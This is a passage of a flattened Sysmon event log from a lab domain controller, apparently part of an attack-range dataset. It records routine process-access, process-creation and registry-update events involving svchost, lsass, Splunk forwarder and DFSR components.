Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92ED-6005-C804-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92ED-6005-C804-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-92ED-6005-C804-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:57.126{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:57.126{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:57.126{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:58.861{59A5CD1D-8E46-6005-1600-00000000A301}15444448C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:58.861{59A5CD1D-8E46-6005-1600-00000000A301}15444448C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000009247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00127603) 13241300x80000000000000009246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed98-0xfd867ae5) 13241300x80000000000000009245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda1-0x5f4ae2e5) 13241300x80000000000000009244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda9-0xc10f4ae5) 13241300x80000000000000009243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000009242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00127603) 13241300x80000000000000009241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed98-0xfd867ae5) 13241300x80000000000000009240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda1-0x5f4ae2e5) 13241300x80000000000000009239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:00.204{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda9-0xc10f4ae5) 13241300x80000000000000009251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:30.594{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000009250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:30.594{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000009249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:54:30.594{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x80000000000000009270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 